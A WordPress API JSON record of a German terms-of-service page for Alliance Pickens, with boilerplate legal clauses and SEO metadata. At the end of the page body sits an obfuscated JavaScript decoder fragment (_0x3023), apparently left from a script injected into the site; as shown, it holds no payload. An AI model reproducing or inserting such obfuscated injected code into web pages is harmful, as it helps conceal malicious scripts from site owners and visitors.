{"id":6864,"date":"2020-10-28T14:31:40","date_gmt":"2020-10-28T14:31:40","guid":{"rendered":"http:\/\/alliancepickens.com\/allgemeine-geschaeftsbedingungen\/"},"modified":"2020-12-04T17:52:59","modified_gmt":"2020-12-04T17:52:59","slug":"allgemeine-geschaeftsbedingungen","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/allgemeine-geschaeftsbedingungen\/","title":{"rendered":"Allgemeine Gesch\u00e4ftsbedingungen"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Letzte Aktualisierung:  December 4, 2020<\/p>\n<p>Bitte lesen Sie diese Nutzungsbedingungen (&#8220;Nutzungsbedingungen&#8221;, &#8220;Nutzungsbedingungen&#8221;) sorgf\u00e4ltig durch, bevor Sie die http:\/\/alliancepickens.com Website (den &#8220;Dienst&#8221;) nutzen, die von Alliance Pickens (&#8220;uns&#8221;, &#8220;wir&#8221; oder &#8220;unser&#8221;) betrieben wird.<\/p>\n<p>Ihr Zugriff auf und die Nutzung des Dienstes ist von Ihrer Annahme und Einhaltung dieser Bedingungen abh\u00e4ngig. Diese Bedingungen gelten f\u00fcr alle Besucher, Nutzer und andere, die auf den Dienst zugreifen oder ihn nutzen.<\/p>\n<p>Durch den Zugriff auf oder die Nutzung des Dienstes erkl\u00e4ren Sie sich mit diesen Bedingungen einverstanden. Wenn Sie mit einem Teil der Bedingungen nicht einverstanden sind, k\u00f6nnen Sie nicht auf den Dienst zugreifen.<\/p>\n<h3>Geistiges Eigentum<\/h3>\n<p>Der Dienst und seine urspr\u00fcnglichen Inhalte, Funktionen und Funktionen sind und bleiben ausschlie\u00dfliches Eigentum Alliance Pickens und seine Lizenzgeber.<\/p>\n<h3>Links zu anderen Websites<\/h3>\n<p>Unser Service kann Links zu Websites oder Diensten Dritter enthalten, die nicht im Besitz von . Alliance Pickens<\/p>\n<p>Alliance Pickens  hat keine Kontrolle \u00fcber den Inhalt, die Datenschutzrichtlinien oder die Praktiken von Websites oder Diensten Dritter und \u00fcbernimmt keine Verantwortung. Sie erkennen ferner an und stimmen zu, dass  Alliance Pickens  ist nicht verantwortlich oder haftbar, direkt oder indirekt, f\u00fcr Sch\u00e4den oder Verluste, die durch oder im Zusammenhang mit der Nutzung oder dem Vertrauen auf solche Inhalte, Waren oder Dienstleistungen, die auf oder \u00fcber solche Websites oder Dienste verf\u00fcgbar sind, verursacht oder angeblich verursacht werden.<\/p>\n<p>Wir empfehlen Ihnen dringend, die Gesch\u00e4ftsbedingungen und Datenschutzrichtlinien von Websites oder Diensten Dritter zu lesen, die Sie besuchen.<\/p>\n<h3>Beendigung<\/h3>\n<p>Wir k\u00f6nnen den Zugang zu unserem Dienst aus irgendeinem Grund, einschlie\u00dflich und ohne Einschr\u00e4nkung, wenn Sie gegen die Bedingungen versto\u00dfen, unverz\u00fcglich ohne vorherige Ank\u00fcndigung oder Haftung beenden oder aussetzen.<\/p>\n<p>Alle Bestimmungen der Bedingungen, die ihrer Natur nach die K\u00fcndigung \u00fcberdauern sollten, bleiben \u00fcber die K\u00fcndigung hinaus bestehen, einschlie\u00dflich, aber nicht beschr\u00e4nkt auf Eigentumsbestimmungen, Gew\u00e4hrleistungsausschl\u00fcsse, Entsch\u00e4digung und Haftungsbeschr\u00e4nkungen.<\/p>\n<h3>Haftungsausschluss<\/h3>\n<p>Ihre Nutzung des Dienstes erfolgt auf Ihr alleiniges Risiko. Der Dienst wird auf der Basis &#8220;AS IS&#8221; und &#8220;AS AVAILABLE&#8221; bereitgestellt. Der Dienst wird ohne ausdr\u00fcckliche oder stillschweigende Gew\u00e4hrleistungen, einschlie\u00dflich, aber nicht beschr\u00e4nkt auf stillschweigende Gew\u00e4hrleistungen der Marktg\u00e4ngigkeit, Eignung f\u00fcr einen bestimmten Zweck, Nichtverletzung oder Leistungsablauf, bereitgestellt.<\/p>\n<h3>Geltendes Recht<\/h3>\n<p>Diese Bedingungen werden in \u00dcbereinstimmung mit den Gesetzen der Vereinigten Staaten ohne Ber\u00fccksichtigung ihrer Kollisionsnormen geregelt und ausgelegt.<\/p>\n<p>Unser Vers\u00e4umnis, ein Recht oder eine Bestimmung dieser Bedingungen durchzusetzen, gilt nicht als Verzicht auf diese Rechte. Sollte eine Bestimmung dieser Bedingungen von einem Gericht f\u00fcr ung\u00fcltig oder nicht durchsetzbar erkl\u00e4rt werden, bleiben die \u00fcbrigen Bestimmungen dieser Bedingungen in Kraft. Diese Bedingungen stellen die gesamte Vereinbarung zwischen uns in Bezug auf unseren Service dar und ersetzen alle vorherigen Vereinbarungen, die wir zwischen uns in Bezug auf den Service haben k\u00f6nnten.<\/p>\n<h3>\u00c4nderungen<\/h3>\n<p>Wir behalten uns das Recht vor, diese Bedingungen nach unserem alleinigen Ermessen jederzeit zu \u00e4ndern oder zu ersetzen. Wenn eine \u00dcberarbeitung wesentlich ist, werden wir versuchen, mindestens 30 Tage vor Inkrafttreten neuer Bedingungen eine Frist zu gew\u00e4hren. Was eine wesentliche \u00c4nderung darstellt, wird nach unserem alleinigen Ermessen festgelegt.<\/p>\n<p>Durch den weiteren Zugriff auf oder die Nutzung unseres Dienstes nach Inkrafttreten dieser \u00dcberarbeitungen erkl\u00e4ren Sie sich mit den \u00fcberarbeiteten Bedingungen einverstanden. Wenn Sie den neuen Bedingungen nicht zustimmen, beenden Sie bitte die Nutzung des Dienstes.<\/p>\n<h3>kontaktieren Sie uns<\/h3>\n<p>Wenn Sie Fragen zu diesen Bedingungen haben, kontaktieren Sie <a href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact_directions\">uns<\/a>bitte .[\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=&#8221;stretch_row&#8221; parallax=&#8221;content-moving&#8221; parallax_image=&#8221;3871&#8243; el_class=&#8221;getstarted&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h3>Wir freuen uns auf ein Gespr\u00e4ch mit Ihnen!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/about-us\/contact-directions\/\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Letzte Aktualisierung: Bitte lesen Sie diese Nutzungsbedingungen (&#8220;Nutzungsbedingungen&#8221;, &#8220;Nutzungsbedingungen&#8221;) sorgf\u00e4ltig durch, bevor Sie die Website (den &#8220;Dienst&#8221;) nutzen, die von (&#8220;uns&#8221;, &#8220;wir&#8221; oder &#8220;unser&#8221;) betrieben wird. Ihr Zugriff auf und die Nutzung des Dienstes ist von Ihrer Annahme und Einhaltung dieser Bedingungen abh\u00e4ngig. Diese Bedingungen gelten f\u00fcr alle Besucher, Nutzer und andere, die auf&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-6864","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Allgemeine Gesch\u00e4ftsbedingungen - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/allgemeine-geschaeftsbedingungen\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Allgemeine Gesch\u00e4ftsbedingungen - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Letzte Aktualisierung: Bitte lesen Sie diese Nutzungsbedingungen (&#8220;Nutzungsbedingungen&#8221;, &#8220;Nutzungsbedingungen&#8221;) sorgf\u00e4ltig durch, bevor Sie die Website (den &#8220;Dienst&#8221;) nutzen, die von (&#8220;uns&#8221;, &#8220;wir&#8221; oder &#8220;unser&#8221;) betrieben wird. Ihr Zugriff auf und die Nutzung des Dienstes ist von Ihrer Annahme und Einhaltung dieser Bedingungen abh\u00e4ngig. Diese Bedingungen gelten f\u00fcr alle Besucher, Nutzer und andere, die auf&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/allgemeine-geschaeftsbedingungen\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-04T17:52:59+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/allgemeine-geschaeftsbedingungen\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/allgemeine-geschaeftsbedingungen\\\/\",\"name\":\"Allgemeine Gesch\u00e4ftsbedingungen - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"datePublished\":\"2020-10-28T14:31:40+00:00\",\"dateModified\":\"2020-12-04T17:52:59+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/allgemeine-geschaeftsbedingungen\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/allgemeine-geschaeftsbedingungen\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/allgemeine-geschaeftsbedingungen\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Allgemeine Gesch\u00e4ftsbedingungen\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Allgemeine Gesch\u00e4ftsbedingungen - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/allgemeine-geschaeftsbedingungen\/","og_locale":"de_DE","og_type":"article","og_title":"Allgemeine Gesch\u00e4ftsbedingungen - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221;][vc_column][vc_column_text]Letzte Aktualisierung: Bitte lesen Sie diese Nutzungsbedingungen (&#8220;Nutzungsbedingungen&#8221;, &#8220;Nutzungsbedingungen&#8221;) sorgf\u00e4ltig durch, bevor Sie die Website (den &#8220;Dienst&#8221;) nutzen, die von (&#8220;uns&#8221;, &#8220;wir&#8221; oder &#8220;unser&#8221;) betrieben wird. Ihr Zugriff auf und die Nutzung des Dienstes ist von Ihrer Annahme und Einhaltung dieser Bedingungen abh\u00e4ngig. Diese Bedingungen gelten f\u00fcr alle Besucher, Nutzer und andere, die auf&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/allgemeine-geschaeftsbedingungen\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-04T17:52:59+00:00","twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/allgemeine-geschaeftsbedingungen\/","url":"https:\/\/alliancepickens.com\/de\/allgemeine-geschaeftsbedingungen\/","name":"Allgemeine Gesch\u00e4ftsbedingungen - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"datePublished":"2020-10-28T14:31:40+00:00","dateModified":"2020-12-04T17:52:59+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/allgemeine-geschaeftsbedingungen\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/allgemeine-geschaeftsbedingungen\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/allgemeine-geschaeftsbedingungen\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Allgemeine Gesch\u00e4ftsbedingungen"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6864","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=6864"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/6864\/revisions"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=6864"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}